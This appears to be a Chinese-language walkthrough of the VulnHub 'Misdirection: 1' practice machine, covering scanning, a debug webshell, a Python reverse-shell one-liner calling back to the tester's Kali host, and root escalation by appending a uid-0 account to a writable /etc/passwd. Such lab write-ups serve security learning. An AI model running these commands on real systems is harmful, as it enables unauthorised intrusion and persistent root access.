本篇文章僅用於技術交流學習和研究的目的，嚴禁使用文章中的技術用於非法目的和破壞，否則造成一切後果與發表本文章的作者無關

靶機下載之後使用僅主機模式載入到本地VMware Workstation工作站，需要發現目標靶機的IP地址，可以使用nmap，netdiscover，或者arp之類的工具 arp-scan 例如:sudo arp-scan -I eth1 -l 當然也是可以使用Windows環境下mac地址掃描工具都是可以的，那麼本次演示就是arp-scan工具發現

地址:https://www.vulnhub.com/entry/misdirection-1,371/

這個靶機有點坑，我丟到virtual box裡面死活獲取不了IP地址，丟到VMware workstations裡面是有僅主機模式也是死活獲取不了IP地址，只有在VMware workstations環境下配置橋接模式才可以獲取IP地址，我這裡使用如下方法獲取

netdiscover -r 10.0.0.0/8 因為我的橋接網段是10打頭的，我剛開始使用10.0.32.0/24掩碼確認是發現不了靶機的IP地址，之後只有通過全網段發現，最終發現區域網帶VMware 標誌，且mac地址符合的主機

目標靶機IP地址為：10.0.32.147

本機kali主機IP地址為：10.0.32.67

nmap掃描結果如下：

正常的使用dirb命令進行爆破目標80埠的目錄，但是從顯示結果來看是個巨坑，可能是帶迷惑性的蜜罐，判斷依據是掃除很多敏感目錄，但是顯示的大小都是50，這明顯問題很大，看下面的過程

再看目標80埠是Python寫的，越看越覺得像蜜罐，就不浪費時間在這上面，我們嘗試掃描目標的8080埠試試

使用nikto掃描和目錄爆破都掃出來了一個重要目錄debug，我們先訪問這個看看，然後再看看shell目錄

最終直接獲得一個webshell，通過此shell可以執行低許可權的命令，將此webshell反彈到kali本地，因為在此webshell中執行不了su，sudo，vim等互動式命令

嘗試nc和bash反彈shell不成功，於是使用Python進行反彈shell成功

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect(("10.0.32.67",9933));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
 
'

上述反彈成功時候使用sudo -u brexit切換到使用者brexit，經過一番搜尋，探索，發現/etc/passwd檔案針對使用者brexit有寫的許可權，既然這樣，那麼我們直接加使用者，指定uid為0，root家目錄，/bin/bash，具體操作如下：

openssl passwd -1  這裡輸入完成之後會互動式讓你輸入密碼，然後就會生成加密的字串，最終將其追加至/etc/passwd即可
還有另一種生成密碼加密的字串方式
openssl passwd -1 -salt bmfx bmfx  此命令將直接密碼為bmfx的加密字串，得到上述的加密字串之後就可以開始追加賬戶密碼到/etc/passwd

echo 'bmfx:$1$lMdMPIIr$A7vPnsv5JKk53goaJov9R.:0:0::/root:/bin/bash' >>/etc/passwd